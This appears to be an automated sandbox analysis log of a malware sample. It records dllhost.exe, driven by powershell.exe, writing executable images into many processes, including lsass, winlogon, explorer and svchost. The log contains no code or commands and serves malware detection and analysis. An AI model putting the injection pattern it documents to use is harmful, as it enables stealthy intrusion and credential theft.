Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1D865090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 199015D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 188D6710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29F37400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5968Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 5968 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 2F00000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 947DB66010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17184260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
